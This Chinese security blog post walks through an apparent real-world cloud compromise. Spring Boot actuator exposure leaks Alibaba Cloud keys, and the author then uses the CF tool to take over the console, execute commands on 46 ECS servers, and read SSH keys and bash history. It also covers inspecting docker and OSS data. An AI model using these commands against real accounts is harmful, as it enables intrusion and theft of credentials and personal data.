一次简单的”云”上野战记录
0x00 Springboot actuator开局
打点发现某系统存在springboot actuator未授权访问,看到一个神奇的oss接口,springboot未授权玩了这么多年,也是第一次碰到云的响应:
直接访问,AK到手:
0x01 一键接管?
配置AK:
cf config
查看当前AK的权限:
cf alibaba perm
一键接管控制台:
cf alibaba console
云上自带的扫描,可以看到有好多漏洞都未修复,相当于一堆靶场啊:
0x02 ECS利用
列出ECS:
cf alibaba ecs ls
46台服务器到手(有几个stoped),直接命令三连,截图留证:
cf alibaba ecs exec -b
然后就是翻翻实例,看看能不能发现什么有用的信息。
root权限,直接开始捡漏,看到了公私钥,又一波免密登录机器到手:
cf alibaba ecs exec -i 实例ID -c "ls ~/.ssh"
cf alibaba ecs exec -i 实例ID -c "ls ~/.bash_history"
熟悉的味道,碰到了久违的k8s,拿下拿下:
cf alibaba ecs exec -i 实例ID -c "docker ps -a"
再看看数据库吧:
0x03 OSS利用
内容比较多,直接oss浏览器连接查看,太多了,懒得翻了,一般会存一些照片(证件照?),备份库之类的:
0x04 总结
Springboot未授权访问获取AK,CF一把梭,ECS翻翻配置和历史命令记录,发现docker和数据库信息,OSS翻翻文件,发现数据库文件,结束。
原文始发于微信公众号(哈拉少安全小队):一次简单的云上野战记录
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论